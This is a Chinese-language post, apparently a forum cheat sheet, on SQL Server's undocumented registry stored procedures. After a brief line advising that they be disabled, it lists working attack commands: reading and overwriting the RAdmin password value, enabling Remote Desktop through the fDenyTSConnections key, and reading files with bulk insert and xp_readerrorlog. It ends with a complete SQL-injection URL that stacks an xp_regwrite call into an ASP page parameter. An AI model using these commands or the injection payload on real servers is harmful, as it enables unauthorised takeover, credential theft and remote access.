SQL Server中包含了幾個可以訪問系統注冊表的擴展存儲過程.但實際上這幾個擴展存儲過程是未公開的,從sql server 7.0就有了,
在SQL server 2000中仍然保留,他們以后可能會刪除.但是這幾個存儲過程卻提供了在當前的SQL Server版本中訪問系統注冊表的能力,
而且很多人利用SQL Server來進行攻擊系統時,往往都會用到這幾個擴展存儲過程.所以最好在SQL Server中禁用他們.
xp_regenumvalues 以多個記錄集方式返回所有鍵值
使用方法:
xp_regenumvalues 注冊表根鍵, 子鍵
比如說,想看看HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Run 的所有鍵值:
use master
exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE/Microsoft/Windows/CurrentVersion/Run'
exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SYSTEM/RAdmin/v2.0/Server/Parameters'
xp_regread 返回制定鍵的值
使用方法:
xp_regread 根鍵,子鍵,鍵值名
use master
exec xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE/Microsoft/Windows/CurrentVersion','CommonFilesDir'
exec xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM/RAdmin/v2.0/Server/Parameters','Parameter'
得到密碼
exec xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM/CurrentControlSet/Control/Terminal Server','fDenyTSConnections'
遠程桌面開啟為0
xp_regwrite 寫入注冊表
使用方法:
xp_regwrite 根鍵,子鍵, 值名, 值類型, 值
use master
exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE/Microsoft/Windows/CurrentVersion','TestValueName','reg_sz','hello'
exec xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM/RAdmin/v2.0/Server/Parameters','Parameter','REG_BINARY',0xD7B7CB315B4E731D8E9EF886CE6DCB23
exec xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM/RAdmin/v2.0/Server/Parameters','Parameter','REG_BINARY',0xD7B7CB315B4E731D8E9EF886CE6DCB23;--
exec xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM/RAdmin/v2.0/Server/Parameters','Parameter','REG_BINARY','';--
必須清空后再寫新數值
修改成功的前提是值為空
注意值類型有2種REG_SZ 表示字符型,相當于新建字符串值,REG_DWORD 表示整型,相當于新建DWORD值
REG_BINARY
exec xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM/CurrentControlSet/Control/Terminal Server','fDenyTSConnections','REG_DWord',1;--
禁用遠程桌面
xp_regdeletevalue 刪除某個值
使用方法:
xp_regdeletevalue 根鍵,子鍵,值名
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE/Microsoft/Windows/CurrentVersion','TestValueName'
use master
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SYSTEM/RAdmin/v2.0/Server/Parameters','Parameter'
xp_regdeletekey 刪除鍵,包括該鍵下所有值
使用方法:
use master
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE/Microsoft/Windows/CurrentVersion/Testkey'
exec xp_regdeletekey 'HKEY_LOCAL_MACHINE','SYSTEM/RAdmin/v2.0/Server/Parameters'
運行前提SA
可能用處不是很大,也沒深入研究,因為覺得讀asp用xp_makecab更方便點,僅供思維擴展。
方法1.bulk insert aaa FROM 'c:/1.txt'
方法2.xp_readerrorlog 1,'c:/1.txt'
開啟遠程桌面http://192.168.200.188/product_list.asp?classid=14;exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM/CurrentControlSet/Control/Terminal Server','fDenyTSConnections','REG_DWord',0;--
